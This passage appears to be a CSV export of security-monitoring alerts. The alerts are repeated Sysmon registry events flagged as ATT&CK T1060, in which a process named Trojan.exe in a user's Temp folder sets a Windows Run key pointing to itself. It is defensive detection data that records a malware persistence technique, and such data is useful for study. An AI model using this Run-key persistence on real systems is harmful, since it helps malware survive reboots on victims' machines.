..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:01.794360400Z"",""eventRecordID"":""1953"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:01.793\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:01.793"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:04.174",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:00.778 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:00.783387300Z"",""eventRecordID"":""1952"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:00.778\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:00.778"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:03.174",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:59.777 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:59.778918300Z"",""eventRecordID"":""1951"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:59.777\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:59.777"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:02.174",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:58.762 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:58.764128900Z"",""eventRecordID"":""1950"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:58.762\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:58.762"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:01.174",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:57.746 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:57.748048200Z"",""eventRecordID"":""1949"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:57.746\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:57.746"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:00.144",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:56.731 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:56.737863200Z"",""eventRecordID"":""1948"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:56.731\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:56.731"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:59.128",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:55.715 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:55.717702300Z"",""eventRecordID"":""1947"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:55.715\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:55.715"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:58.206",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:54.699 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:54.701127900Z"",""eventRecordID"":""1946"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:54.699\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:54.699"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:58.190",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:53.684 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:53.685269100Z"",""eventRecordID"":""1945"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:53.684\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:53.684"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:58.097",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:52.668 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:52.669576400Z"",""eventRecordID"":""1942"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:52.668\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:52.668"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:55.049",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:51.652 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:51.658811200Z"",""eventRecordID"":""1941"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:51.652\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:51.652"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:54.055",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:50.621 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
